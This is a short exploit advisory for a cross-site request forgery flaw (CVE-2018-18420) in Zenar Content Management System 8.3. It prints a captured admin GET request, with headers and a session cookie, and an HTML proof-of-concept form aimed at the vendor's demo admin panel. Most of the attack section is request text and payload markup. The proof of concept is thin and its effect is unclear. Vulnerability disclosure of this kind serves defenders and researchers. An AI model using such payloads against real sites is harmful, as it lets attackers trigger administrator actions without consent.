Zenar Content Management System version 8.3 suffers from a cross site request forgery vulnerability.
1ca21d4ea7dad9557ab0feb02503c410
# Exploit Title: Zenar Content Management System 8.3 - Cross-Site Request Forgery ( CSRF )
# Date: 2018-05-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://zenar.io/
# Software Link : https://github.com/TribalSystems/Zenario/releases/tag/8.3.47997
# Software : Zenar Content Management System 8.3
# Version : 8.3
# Vulernability Type : Web Application
# Vulenrability : Cross-Site Request Forgery ( CSRF )
# CVE : CVE-2018-18420
# Cross-Site Request Forgery (CSRF) vulnerability was discovered in
# the 8.3 version of Zenar Content Management System via the
# admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent URI.
# POC :
# GET Request :
Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0
Request Method: GET
Status Code: 200 OK
Remote Address: 213.146.173.88:80
Referrer Policy: no-referrer-when-downgrade
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
Host: demo.zenar.io
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
X-Requested-With: XMLHttpRequest
# Query String Parametres :
path: zenario__content/panels/content
skinId:
refinerId: html
refinerName: content_type
refiner__content_type: html
_limit: 50
_start: 0
_item: html_10
_sort_col: first_created_datetime
_sort_desc: 0
# CSRF HTML :
<html><head>
<title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title>
</head><body>
<form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET">
<input type="text" name="html_" value="10" /><br />
<input type='submit' value='Go!' />
</form>
</body></html>
# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln